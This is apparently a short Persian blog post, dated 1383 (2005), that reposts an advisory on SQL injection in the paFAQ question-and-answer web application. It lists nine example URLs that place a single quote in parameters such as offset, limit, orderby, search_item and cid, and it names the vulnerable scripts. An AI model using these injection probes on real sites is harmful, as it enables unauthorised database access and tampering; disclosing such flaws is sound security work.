عشق من لواشک


http://www.example.com/index.php?act=Question&id=1
&limit=10&orderby=q_id&order=DESC&offset='

http://www.example.com/index.php?act=Question&id=1
&orderby=q_id&order=DESC&limit='

http://www.example.com/index.php?act=Question&id=1
&orderby=q_id&order='&limit=10

http://www.example.com/index.php?act=Question&id=1
&orderby='&order=DESC&limit=10

http://www.example.com/index.php?act=Answer
&cid=1&id=1&offset='

http://www.example.com/index.php?act=Search
&code=01&search_item='

http://www.example.com/index.php?act=Speak&code=05&poster=1
&name=2&question=3&email=4&cat_id='

http://www.example.com/index.php?act=Speak&code=02
&cid='&id=1&poster=1&name=2&answer=3&email=4

http://www.example.com/index.php?act=Speak&code=02
&cid=1&id='&poster=1&name=2&answer=3&email=4
paFAQ یک سیستم یا برنامه تحت وب (webapplication) است که برای مدیریت سوال و جواب روی وب سایت ها مورد استفاده قرار می گیرد.
آسیب پذیری با نام SQL Injection Vulnerability که باعث می شود مهاجم یک سری کد های مخرب را روی این بانک اطلاعاتی SQL این مجموعه ایجاد کنید و باعث اجرای بعضی query های خطرناک روی بانک اطلاعاتی شود. این آسیب پذیری در قسمت های 'question.php', 'answer.php', 'search.php', 'comment.php این سیستم موجد است.
 okبرای توضیحاتokکلید کنید
مهدی شنبه 8 اسفند‌ماه سال 1383 ساعت 03:22
نظرات 0 + ارسال نظر
برای نمایش آواتار خود در این وبلاگ در سایت Gravatar.com ثبت نام کنید. (راهنما)
ایمیل شما بعد از ثبت نمایش داده نخواهد شد